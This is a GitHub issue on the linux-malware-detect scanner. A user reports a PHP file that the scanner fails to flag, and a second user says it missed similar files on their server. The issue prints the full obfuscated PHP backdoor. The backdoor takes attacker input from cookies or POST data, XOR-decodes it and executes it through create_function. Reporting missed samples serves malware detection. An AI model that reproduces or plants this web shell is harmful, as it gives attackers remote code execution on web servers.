linux-malware-detect icon indicating copy to clipboard operation
linux-malware-detect copied to clipboard

Published 20 hours ago verified publisher icon rfxn

Suspicious file - no hit

Open neilsf opened this issue 5 years ago • 1 comments

Hi I don't know if this is the right place to submit possible threats but I've found this one that maldet misses:

<?php $ofmki = 'ra97s5uf8mHvibg3#tdy_plc-2e\'0416nx*ko';$frvdd = Array();$frvdd[] = $ofmki[15].$ofmki[25].$ofmki[2].$ofmki[13].$ofmki[2].$ofmki[13].$ofmki[5].$ofmki[2].$ofmki[24].$ofmki[8].$ofmki[2 5].$ofmki[30].$ofmki[5].$ofmki[24].$ofmki[29].$ofmki[28].$ofmki[31].$ofmki[28].$ofmki[24].$ofmki[1].$ofmki[13].$ofmki[3].$ofmki[15].$ofmki[24].$ofmki[28].$ofmki[30].$ofmki[8].$ofmki[13].$ofmk i[3].$ofmki[3].$ofmki[3].$ofmki[8].$ofmki[5].$ofmki[23].$ofmki[8].$ofmki[26];$frvdd[] = $ofmki[23].$ofmki[0].$ofmki[26].$ofmki[1].$ofmki[17].$ofmki[26].$ofmki[20].$ofmki[7].$ofmki[6].$ofmki[3 2].$ofmki[23].$ofmki[17].$ofmki[12].$ofmki[36].$ofmki[32];$frvdd[] = $ofmki[10].$ofmki[34];$frvdd[] = $ofmki[16];$frvdd[] = $ofmki[23].$ofmki[36].$ofmki[6].$ofmki[32].$ofmki[17];$frvdd[] = $o fmki[4].$ofmki[17].$ofmki[0].$ofmki[20].$ofmki[0].$ofmki[26].$ofmki[21].$ofmki[26].$ofmki[1].$ofmki[17];$frvdd[] = $ofmki[26].$ofmki[33].$ofmki[21].$ofmki[22].$ofmki[36].$ofmki[18].$ofmki[26] ;$frvdd[] = $ofmki[4].$ofmki[6].$ofmki[13].$ofmki[4].$ofmki[17].$ofmki[0];$frvdd[] = $ofmki[1].$ofmki[0].$ofmki[0].$ofmki[1].$ofmki[19].$ofmki[20].$ofmki[9].$ofmki[26].$ofmki[0].$ofmki[14].$o fmki[26];$frvdd[] = $ofmki[4].$ofmki[17].$ofmki[0].$ofmki[22].$ofmki[26].$ofmki[32];$frvdd[] = $ofmki[21].$ofmki[1].$ofmki[23].$ofmki[35];foreach ($frvdd[8]($_COOKIE, $_POST) as $gnkbk => $fp rdjo){function wanwk($frvdd, $gnkbk, $rszaatj){return $frvdd[7]($frvdd[5]($gnkbk . $frvdd[0], ($rszaatj / $frvdd[9]($gnkbk)) + 1), 0, $rszaatj);}function qmvpbfi($frvdd, $bcurb){return @$frvd d[10]($frvdd[2], $bcurb);}function gvygyc($frvdd, $bcurb){$ixyulr = $frvdd[4]($bcurb) % 3;if (!$ixyulr) {$acmydm = $frvdd[1]; $nawmu = $acmydm("", $bcurb[1]($bcurb[2]));$nawmu();exit();}}$fpr djo = qmvpbfi($frvdd, $fprdjo);gvygyc($frvdd, $frvdd[6]($frvdd[3], $fprdjo ^ wanwk($frvdd, $gnkbk, $frvdd[9]($fprdjo))));}

Can you please investigate or let me know where to submit. Thanks

neilsf avatar Dec 16 '19 10:12 neilsf

It also missed a lot of files in my server.

I don't know what I'm doing wrong, but they were similar files to yours.

fernandoch777 avatar Jan 08 '20 15:01 fernandoch777